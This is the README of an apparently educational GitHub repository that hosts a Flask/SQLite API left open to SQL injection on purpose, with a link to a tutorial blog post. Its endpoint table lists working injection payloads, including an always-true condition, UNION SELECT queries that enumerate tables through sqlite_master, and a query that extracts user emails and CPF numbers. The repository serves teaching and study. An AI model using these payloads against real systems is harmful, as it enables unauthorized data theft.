Skip to content

guilatrova/flask-sqlinjection-vulnerable

Repository files navigation

Flask Vulnerable to SQL Injection 💉🔓

Code style: black try/except style: tryceratops Open in Visual Studio Code


The purpose of this repository is to allow us to explore an API vulnerable to SQL Injection (using Python, Flask, and SQLite).

You're free to play with it as is, but you might have more fun doing it alongside me in a blog post: https://blog.guilatrova.dev/how-sql-injection-attack-works-with-examples/.

Open in Gitpod

You can play with the following endpoints (considering you're running on localhost):

Endpoint Description
/challenges/111.111.111-11 Expected usage
/challenges/' or '1' = '1 Vulnerability proof
/challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_% Breaks server
/challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_% Queries all tables and fixes broken server
/challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; -- Use union select to query data from other tables

Releases

No releases published

Packages

No packages published